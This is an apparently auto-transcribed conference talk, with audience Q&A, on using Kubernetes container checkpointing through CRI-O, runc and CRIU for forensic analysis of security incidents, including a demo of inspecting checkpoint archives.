 Hello everyone. Today we'll be talking about our work with Adren Weber on introducing container checkpointing in Kubernetes and how we can use this for forensic analysis. There was a talk a few years back at KubeCon introducing forensic container checkpointing and how what are the tools that can be used in production to respond to security incidents and how these tools can be used with containers. And one thing during this talk was mentioned was that containers don't support snapshotting and this time was student development and we recently introduced a new feature in Kubernetes that allows you to take a checkpoint of a container. So in this talk I will first briefly cover what are the security boundaries in Kubernetes, what are the different threat models that we're going to look into and then I will cover what is container checkpointing and how does it work and how we can use this to perform forensic analysis and what are the limitations and some of the future work. So there are two main areas of concern in terms of security for Kubernetes. The first one are the configurable components in Kubernetes and the second is essentially the applications that are running in the cluster. In Kubernetes there are many components running on the control plane node that can be configured and every node is also running Kubernetes component called Kubelet that is important to be secure. Namespaces are used for isolation between different tenants and the pods are introducing security context between different containers running on the cluster and containers isolate applications from the host environment itself and in addition to that every application has different network namespace that isolates the communication, different DNS example and Kubernetes also makes available secrets and tokens to the application and of course the application is processing sensitive data from users. So the three main trade models that we are going to look into is when an external attacker has access to an application running over the network. In this case the security controls that are commonly used is to encrypt all network traffic and to use authentication and authorization for all APIs. Another aspect is when an attacker has compromised the container in the cluster or has been able to use a malicious container image to run essentially malicious container on the cluster. So in this case the attacker can try to escape the container or perform privilege escalation to take over the whole cluster and the common security controls in this case are essentially limiting the privileges available to containers and limiting the access to the Kubelet running on the node and preventing the applications running in the container from loading kernel modules and restricting what network access the applications would have. Another trade model is when an attacker has been able to for example steal the keys for accessing the Kubernetes API server so they would be able to create pods and create containers in the cluster itself and in this case different security controls that can be used are role-based access control and limiting what a user in Kubernetes can do and limiting the quotas of resources that can be allocated to a single user. So the problem here is that real time monitoring systems for Kubernetes don't currently support the ability to take a snapshot of the applications that are running in a container and use this to analyze what has happened during a security incident and container checkpointing can capture and preserve the state and can be used to analyze what has happened a specific point in time but also we need advanced tools to be able to analyze the state. So how do we enable container checkpointing and how to use it? In Kubernetes there are different pods. There could be multiple pods running on a cluster node and every pod can have multiple containers inside it and every container has a process tree, essentially a set of processes running. When the container engine in this case cryo is involved to perform a checkpoint then it would essentially call the container runtime in this case run C and run C will call CRIU and CRIU is going to create a snapshot of essentially serialized the runtime state of all processes running within the container and this state can be used then to restore the container from the point in time when checkpoint was created but it could be also used to analyze what were the processes and what files or network sockets have been opened at this particular time. So to enable checkpointing in Kubernetes CRIU has to be installed on every Kubernetes node. In cryo version 1.25 was introduced the checkpointing feature and we currently have a pull quest for container D. Cryo has to be started with the option enable CRIU support and the container checkpoint feature gate has to be enabled for the cubelet in Kubernetes and then once this is enabled you can perform you can send a post HTTP request to the cubelet API and specify the namespace the port and the container that needs to be checkpointed and then this will this will create a checkpoint essentially at our archive that contains all the state of the container in default location in this case var lib cubelet checkpoints where you can inspect the state further. There is also some discussion about how to optimize essentially the way we store checkpoints because currently everything is stored in a single directory and we want to limit the amount of checkpoints that are going to be created for specific container just to if you have periodic checkpointing to not take the whole disk space available and for this we were probably going to create sub directory or directory for every pod that is probably going to come in in a future version of cryo or cubelet. So I have a short demo of how this works. So this Kubernetes cluster in this case just two nodes and we have a pod running a PHP application in this case while well and I have a shell script which implements the checkpoint command for cube CTO and this allows me to list what are the different containers and the different pods running on this node. So in this case we have this while both pods and with a single container code demo running inside it. So this script will send the post request that was shown on the slide and this will create a checkpoint in the default directory and in this case we have two checkpoints because I tested this before the talk to see if it works and we can use a tool we developed called checkpoint control to inspect the state of essentially to see what is inside of the checkpoint itself and so this is a high level overview showing the IP address of the container that was captured and what is the root diff size. So these are files that have been modified by the application running inside of the container. We can see all these files included deleted ones. Essentially this is capturing the read write layer on top of the container that is used by the application. We can see the checkpoint size and the timestamp essentially when the checkpoint was created. So we recently introduced this feature that allows us to see what are the mount points. So essentially what has been mounted inside of the container, what are the different processes. So we can see the process ID and essentially the process name and just a high level overview of what is captured in the checkpoint in addition. So if we untart the content of the checkpoint we can see all the files inside it and the files or the images that the checkpoint in tool creates are in the sub director code checkpoint. Before this I will just show you the content. So the root effects that diff is essentially are the files that have been modified in the container. We can use a tool called crit or checkpoint restore image tool to essentially decode all the image files. And this allows us to see the details essentially what is the content of all our checkpoint images. In this case what we are seeing here is the process tree image which contains essentially a list of all traits and processes and information about the process identifier, the trait identifier and other additional information about what is actually running in the what is included in the checkpoint. Here we also have something called ghost files. So these are also known as invisible files. This essentially when a file has been deleted but there is an open file descriptor essentially file descriptor open for this file. Then this file is also included in the checkpoint. So we can inspect the content of such files. This is also important if we decide to restore the application and see what how it will perform, what actions is going to perform. And there are many different images and we are currently developing the tools to analyze the state of checkpoint further. So to go back in my presentation some of the limitations. These are some of the three main limitations that I'm going to focus on today. So the Kubernetes secrets are essentially keys or tokens that are made available to applications running in the container to be able to access resources. For example database or other services are in the cluster. And when we create the checkpoints, since this will be stored either as environment variables or in memory of the application, these are also captured with the checkpoint. Which means it is important to keep the checkpoints secure so that we can prevent leaking information about sensitive data such as keys. In the case of live migration and fault tolerance, we would want to keep this information in the checkpoint because we can use the checkpoints to recover the application from failure or to move it to a different physical machine. In the case of fast startup, this is when we want to optimize to improve the startup time of applications by taking a checkpoint immediately after some index or data has been loaded in memory. And starting the application from checkpoint will essentially improve the startup time. In this case, we don't want to keep the secrets or passwords stored in memory because we want to essentially initialize every application with different key. So in this case, we need some techniques or methods to be able to remove this secret information from the checkpoint. Another limitation is when an attacker can essentially perform different actions that would make it more difficult to understand what was actually happening in the container or mimicking the behavior of trusted processes essentially using existing processes within the container that would make it more difficult to understand, for example, what was actually happening during the attack. And an attacker can also perform a set of actions that are not related to the attack itself. And this would also make it more difficult for, for example, intrusion detection systems to detect this attack. And there are certain cases that CRIO doesn't support. So, for example, certain system calls are not supported or certain network sockets or nested namespaces are essentially features that CRIO doesn't support. So if an attacker wants to prevent the checkpoint from being created, then they could use this type of techniques to prevent the checkpoint. And some future work. So how can we use container checkpoints with intrusion detection systems and how this can be used for preventing attacks? There are different aspects that can be used from checkpoints. One is to improve the visibility of tools such as FALCO to be able to see what is actually running in a container, but also to use this for forensic analysis after a security incident has occurred. Container checkpoints can also be used to detect certain actions and trigger an alarm. And a new restart policy can be introduced for containers to allow to restart from a checkpoint. And potential attacks that can be used to inspect with checkpoints are, for example, ESCO injection. We can detect when certain behavior is happening in the container. And it's the same with command line execution or when an attacker is using a FAL inclusion attacker. And when a malicious container has been currently running on the cluster, we can use container checkpoints to detect and improve the monitoring of the system and introduce security policies that would allow us to detect different incidents. And finally, I just want to mention about two groups of participants who are going to work on this project and have been contributing to this work. And thank you very much. And I'll be happy to answer any questions. So this is something we have been discussing in the community. What would be the best approach of doing this? Yes. The way we discuss about implementing it is to introduce a signal handling. So we can send a signal to the application running in the container. Then the application has to essentially drop the secrets. There is another project implementing checkpoint restore for Java applications. They essentially perform certain actions before the checkpoint and then certain actions after the checkpoints, which can help with this as well. So somebody sent us and it can be triggered by triggering the Kubernetes checkpoint. It will trigger inside the Java application. Yeah, but it's still in development. It's still something that we are working on. Yeah. Yes. So after, just to repeat the question, can we have a log that would list all the checkpoints and then use the checkpoints after an incident has occurred? Yes. A checkpoint would allow you to not only see what was actually happening in the container, but for example, if an attacker runs something entirely in memory without touching the disk, which is something that is commonly used today, you can use memory forensics or essentially see what was the memory content inside of the checkpoint and understand what was the attack. Yes. So I'm just trying to mention that I was wondering how much over it does checkpoint in terms of how much space it's taking on the disk once it's created. So I can compare that on the side of the container and so on, but how much does the overall crew generate? Yeah. Crew is very optimized. So the way it works is using the pit-ray system code to enter the address space of the process and then use, essentially create a unique socket with the crew running outside and using supplies, which is essentially avoiding copying the memory from the process into a set of files. So it's very efficient, but of course it depends on the size of the, for example, how much memory does the container use, then we have to save all this state. Yes. So if I'm just going to correct that, you should have some faster permissions in order to create this checkpoint, right? Can I do the same with some new permissions like for the reviewer or people else? Yeah. So essentially it's, I think you need admin permissions at the moment and essentially you're sending HTTP requests to the QBLAD turning on the node. So essentially you just need to be authorized to perform the checkpoint. But if you can create a checkpoint of a container, then you have access to all the memory of that container. So it's, you know, it has to require admin privileges. Yes. Yes. Can we, can we checkpoint the containers one after the other? Was that your question? Yes. So this is actually something that we're working on. Essentially how we can synchronize the checkpoints between different containers. So we, we can synchronize the checkpoints between different containers. So we were introducing essentially a synchronization mechanism that allows to create the checkpoints of two containers at the same time. Or if these containers are running on different nodes to synchronize the checkpoint in between different containers. This, this essentially if you have a distributed application running on multiple nodes in the cluster. Thank you. Thank you. Thank you everyone. And is that